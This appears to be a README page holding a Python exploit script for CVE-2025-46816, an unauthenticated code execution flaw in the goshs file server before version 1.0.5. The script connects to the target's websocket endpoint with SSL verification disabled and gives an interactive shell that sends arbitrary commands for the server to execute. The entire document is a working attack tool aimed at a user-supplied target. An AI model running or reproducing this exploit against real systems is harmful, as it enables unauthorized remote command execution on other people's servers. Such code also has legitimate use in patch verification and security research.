README.md
Rendering markdown...
import ssl
import json
import argparse
import readline
import websockets
from rich import print as rp
from urllib.parse import urlparse
from websockets.sync.client import connect
msg = lambda x, *args, **kw: rp(f"[green]\\[+][/] {x}", *args, **kw)
log = lambda x, *args, **kw: rp(f"[gold3]\\[>][/] {x}", *args, **kw)
err = lambda x, *args, **kw: rp(f"[red]\\[-][/] {x}", *args, **kw)
def parse_opts():
"""
Parse arguments from user
"""
parser = argparse.ArgumentParser(description='Goshs exploit Unauthenticated Code Execution')
parser.add_argument("--target", "-t", help="Target to attack, example: http://ip:port", required=True)
parser.add_argument("--secure", "-s", help="Use encrypted websocket", action='store_true')
return parser.parse_args()
def get_unsafe_ssl_context(is_ssl):
"""
Get an unsafe ssl context
"""
if not is_ssl:
return None
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = False
return ssl_context
if __name__ == '__main__':
args = parse_opts()
log("Exploit by [gold3]@jrjgjk[/gold3] on [gold3]gosh[/gold3] < 1.0.5 [gold3 u]CVE-2025-46816[/gold3 u]")
target = urlparse(args.target).netloc
if not target:
target = args.target
proto = "ws" if not args.secure else "wss"
uri = f"{proto}://{target}/?ws"
msg(f"Connecting to [b blue]{uri}[/b blue]")
with websockets.sync.client.connect(uri, ssl=get_unsafe_ssl_context(args.secure)) as ws_client:
while True:
cmd = input("\x1b[38;5;178mshell@\x1b[1;37mgoshs:\x1b[0m ")
if not cmd.strip():
continue
if cmd in ["x", "exit", "quit", "q"]:
log("Bye !")
break
payload = {"type": "command", "content": cmd}
ws_client.send(json.dumps(payload))
result = ws_client.recv()
json_res = json.loads(result)
print(json_res.get("content", "Error"))